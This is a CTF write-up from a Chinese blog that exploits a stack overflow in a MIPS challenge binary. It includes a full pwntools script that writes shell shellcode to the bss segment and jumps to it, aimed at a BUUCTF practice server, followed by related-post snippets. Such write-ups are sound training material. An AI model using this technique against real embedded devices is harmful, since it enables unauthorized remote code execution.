BUU刷题-Pwn-axb_2019_mips(MIPS跳转bss段执行shellcode)

原创 已于 2024-10-10 23:05:09 修改 · 493 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #pwn #网络安全 #mips

于 2024-10-10 23:03:59 首次发布

解题所涉知识点:

泄露或修改内存数据:

  1. 堆地址:
  2. 栈地址:
  3. libc地址:
  4. BSS段地址:
    劫持程序执行流程:MIPS_ROP
    获得shell或flag:[[MIPS_Shellcode]] && [[MIPS劫持RA寄存器]]

题目类型:
MIPS_Pwn

相关知识点:

信息收集总结

题目信息:

┌──(kali㉿kali)-[~/…/Pwn/BUU/MIPS/axb_2019_mips]
└─$ file ./pwn2
./pwn2: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, not stripped
                                                                                                                    
┌──(kali㉿kali)-[~/…/Pwn/BUU/MIPS/axb_2019_mips]
└─$ checksec --file=pwn2
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified   Fortifiable     FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   82 Symbols      No      0  3pwn2

libc版本:
wp借鉴:buuoj Pwn writeup 216-220-CSDN博客

程序运行回馈

┌──(kali㉿kali)-[~//Pwn/BUU/MIPS/axb_2019_mips]
└─$ qemu-mipsel -L ./ ./pwn2
Welcome to MIPS pwn!
What's your name: 
brinmon
Hello!, brinmon
aaaaaaaaaaaaaaaaaaaaaaaa

核心伪代码分析:

存在利用的的代码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[24]; // [sp+18h] [+18h] BYREF

  alarm(0x3Cu);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  memset(buf, 0, 0x14u);
  puts("Welcome to MIPS pwn!");
  puts("What's your name: ");
  read(0, buf, 0x14u);
  printf("Hello!, %s", buf);
  vuln();
  return 0;
}

ssize_t vuln()
{
  char buf[32]; // [sp+18h] [+18h] BYREF

  return read(0, buf, 0x200u);
}

存在栈溢出

分析:


本地无法打通:

远程打通

攻击思路总结

本地无法打通不知道为什么,通过栈溢出劫持返回地址调用read函数,通过寄存器传参向bss段写入shellcode,之后再劫持返回地址跳转到bss段!

脚本:

import argparse
from pwn import *
from LibcSearcher import *

# Parse command-line arguments
parser = argparse.ArgumentParser(description='Exploit script.')
parser.add_argument('-r', action='store_true', help='Run exploit remotely.')
parser.add_argument('-d', action='store_true', help='Run exploit in debug mode.')
args = parser.parse_args()

pwnfile = './pwn2'
elf = ELF(pwnfile)
context(log_level='debug', arch=elf.arch, os='linux')

is_remote = args.r
is_debug = args.d

if is_remote:
    sh = remote('node5.buuoj.cn', 29922)
else:
    if is_debug:
        sh = process(["qemu-mipsel", "-L", "./", "-g", "1234", pwnfile])
    else:
        sh = process(["qemu-mipsel", "-L", "./", pwnfile])

def mygdb():
    if not is_remote and is_debug:
        gdb.attach(sh, """target remote localhost:1234
                            b *0x400818  
                            c
			""")  # brva 0xe93
mygdb()
bss = 0x410B70
text_read = 0x4007E0
sh.sendafter(b"What's your name: \n",b"brinmon")
 

shellcode = asm(shellcraft.mips.linux.sh(),arch='mips')

#ret2shellcode
payload = b'a'*(36-4)
#fp
payload += p32(bss + 0x200 - 0x40 + 0x28)
#调用read向bss段输入shellcode,然后ret到bss段
payload += p32(text_read)
 
sh.sendline(payload)
sleep(1)
payload = b'a'*(0x20+4)
#ra
payload += p32(bss + 0x200 + 0x28)+shellcode
sh.send(payload)
 
sh.interactive()
PWN系列】格式化字符串在bss上的处理
Vicl1fe的博客
10-19 1616
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: http://www.starssgo.top/2019/12/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%A8bss%E6%AE%B5%E7%9A%84%E5%A4%84%E7%90%86/ 第一次遇到这种,想写wp记录一下,但确实不知道该怎么写才通俗易懂,最后还是感觉结合exp一步一步调试应该会更通俗易懂。 题目分析 开启
buuoj Pwn writeup 216-220
yongbaoii的博客
08-31 584
216 hwb2018_gettingstart 溢出覆盖就好,唯一有个浮点数,网上网站一大把,找一个转换一下就好。 exp from pwn import * context(log_level='debug') r=remote("node4.buuoj.cn","25539") r.recv() v7=0x7FFFFFFFFFFFFFFF v8=0x3FB999999999999A payload='a'*0x18+p64(v7)+p64(v8) r.send(payload) r.
mips&arm&aarch64-pwn初探
seaaseesa的博客
04-02 5446
mips&arm&aarch64-pwn初探 前言 厌倦了x86/x64 平台下的二进制漏洞利用,来看看mips/arm平台下的pwn是如何达到利用的。众所周知,mips/arm架构cpu主要用于嵌入式设备,比如路由器这些。当我们在x86/x64平台练习到一定境界后,再去探索一个新的平台下的漏洞利用,我们可以借鉴以前的方,总之,思想都是一样的。只不过是指令的样子不同而已。 ...
axb_2019_brop64
qq_62887641的博客
10-03 254
64位,只开了NX程序很简单,有一点点花里胡哨,看到栈溢出,看一下有没有坑点(x。
pwn栈溢出学习 基本ROP——ret2shellcode
MrTreebook的博客
11-22 1148
ret2shellcode 目录ret2shellcode1.checksec看一下2.IDA pro看一下 1.checksec看一下 32位的文件 什么保护都没开,并且有可读,可写,可执行 2.IDA pro看一下 gets函数读入一个 s 然后把 s 复制到 buf2
PWN · ret2text | ‘/bin/sh‘写在bss】[HNCTF 2022 Week1]ezr0p32
Mr_Fmnwon的博客
06-10 1856
比较简单,也比较老套,所以更应该记住。
BUU-Pwn-ycb_2020_mipspwn(MIPS_Shellcode)
一个啥也不会的小菜鸡!
10-10 282
┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]libc版本:异构框架之mips框架的pwn学习笔记 | CN-SEC 中文网38;5;38;5;
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1131
利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUU-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
WASM是一种二进制格式,它的设计目标是提供一种安全、快速且与平台无关的方式来执行代码。它不是JavaScript的替代品,而是与JavaScript协同工作,通过JavaScript调用来运行。WASM代码通常由高级语言编译而成,并通过...
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1677
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4239
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2561
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
PWN练习---Stack_2
qq_74259765的博客
08-19 1178
BUUCTF靶场——srop,putsorsys,re2tcsu_1,traveler
axb_2019_fmt32
、moddemod
07-19 876
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8755
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安卓学习项目实践.zip
08-27
安卓学习项目实践.zip
STM32WB新一代无线芯片BLE应用开发和设计-8.低功耗设计.pdf
最新发布
08-27
STM32WB新一代无线芯片BLE应用开发和设计-8.低功耗设计.pdf
kotlin安卓项目实战.zip
08-27
kotlin安卓项目实战.zip
配套 bngelbook 项目的安卓端.zip
08-27
配套 bngelbook 项目的安卓端.zip
buu Quoted-printable
09-13
Quoted-printable是一种编码方,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值